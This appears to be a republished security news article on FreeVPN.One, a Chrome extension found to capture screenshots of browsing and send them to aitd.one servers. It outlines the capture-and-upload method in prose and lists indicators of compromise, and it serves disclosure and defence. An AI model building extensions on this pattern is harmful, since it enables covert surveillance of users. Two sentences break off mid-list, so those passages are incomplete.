A Chrome extension marketed as FreeVPN.One, boasting over 100,000 installations, a verified badge, and featured placement in the Chrome Web Store, has been exposed as spyware that silently captures screenshots of users’ browsing activities and exfiltrates them to remote servers.
Despite its privacy policy explicitly stating that the developer does not collect or use user data, forensic analysis reveals a stark contradiction: the extension engages in persistent surveillance, capturing sensitive information such as banking details, personal messages, and private documents without user consent or notification.
Sophisticated Exfiltration Techniques
The extension’s malicious behavior leverages a two-stage architecture for screenshot capture.
Upon installation, a content script is injected into every HTTP and HTTPS page via broad manifest matches, triggering an automatic 1.1-second delayed capture after page load to ensure full rendering of sensitive content.
This script communicates with the background service worker, which invokes the chrome.tabs.captureVisibleTab() API to generate screenshots, bundling them with the page URL, tab ID, and a unique user identifier before transmitting to aitd[.]one/brange.php.
Additionally, the “Scan with AI Threat Detection” feature, presented as an on-demand local analysis, captures full-page screenshots and uploads them to aitd[.]one/analyze.php, though this is merely a facade for the ongoing background surveillance.
On startup, the extension queries IP geolocation APIs, collects device metadata, and sends base64-encoded analytics to aitd[.]one/bainit.php.
The latest version (v3.1.4) implements AES-256-GCM encryption with RSA key wrapping, obfuscating data in transit and complicating network-based detection.
The extension demands excessive permissions, including
These permissions enable the exfiltration of highly sensitive data, such as passwords and personal photos, directly opposing the privacy expectations of a VPN tool.
What began as a legitimate proxy-based VPN in earlier versions evolved through incremental updates: v3.0.3 introduced
The subsequent v3.1.4 further masked operations by shifting to scan.aitd.one and enhancing encryption.
Developer Claims Fall Short
Contact with the developer elicited defenses, including assertions that automatic captures target only suspicious domains as part of “Background Scanning,” with plans for opt-in consent in future updates.
However, testing confirmed captures on benign sites like Google Sheets and Photos. Claims of transient analysis without storage remain unverifiable, as data is exfiltrated to uncontrolled servers.
According to the report, The developer’s affiliation points to phoenixsoftsol.com, a rudimentary Wix site lacking credible company details, and responses ceased when pressed for verifiable profiles.
This incident underscores vulnerabilities in Chrome’s extension review process, where automated scans and human oversight failed to detect the shift from benign VPN functionality to spyware, despite the extension’s five-year history of purported data integrity.
Authored by Koi Security researchers, this exposure highlights the risks of untrusted third-party extensions in browser ecosystems.
Enterprises relying on such tools face escalating threats, prompting calls for enhanced governance platforms to monitor and mitigate risks across marketplaces.
Indicator of Compromise (IoCs)
| Indicator Type | Value |
|---|---|
| Extension ID | jcbiifklmgnkppebelchllpdbnibihel |
| Domain | aitd.one |
| Domain | extrahefty.com |
| Domain | freevpn.one |
| Domain | scan.aitd.one |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
